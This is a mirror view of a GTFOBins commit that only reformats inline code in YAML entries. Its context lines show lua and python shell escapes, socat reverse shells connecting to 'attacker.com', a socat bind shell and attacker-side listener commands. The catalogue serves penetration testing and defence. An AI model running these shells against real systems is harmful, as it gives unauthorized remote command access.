mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Use double backtick for inline code
This commit is contained in:
parent
b016b7b9dd
commit
4de0246992
@ -3,7 +3,7 @@ functions:
|
||||
execute-interactive:
|
||||
- code: lua -e 'os.execute("/bin/sh")'
|
||||
reverse-shell-non-interactive:
|
||||
- description: Run <code>nc -l -p 12345</code> on the attacker box to receive the shell. This requires `lua-socket` installed.
|
||||
- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires `lua-socket` installed.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
|
@ -3,7 +3,7 @@ functions:
|
||||
execute-interactive:
|
||||
- code: python2 -c 'import os; os.system("/bin/sh")'
|
||||
reverse-shell-interactive:
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
|
@ -3,7 +3,7 @@ functions:
|
||||
execute-interactive:
|
||||
- code: python3 -c 'import os; os.system("/bin/sh")'
|
||||
reverse-shell-interactive:
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
|
@ -1,13 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
reverse-shell-interactive:
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
|
||||
bind-shell-interactive:
|
||||
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
|
||||
- description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
|
||||
|
Loading…
Reference in New Issue
Block a user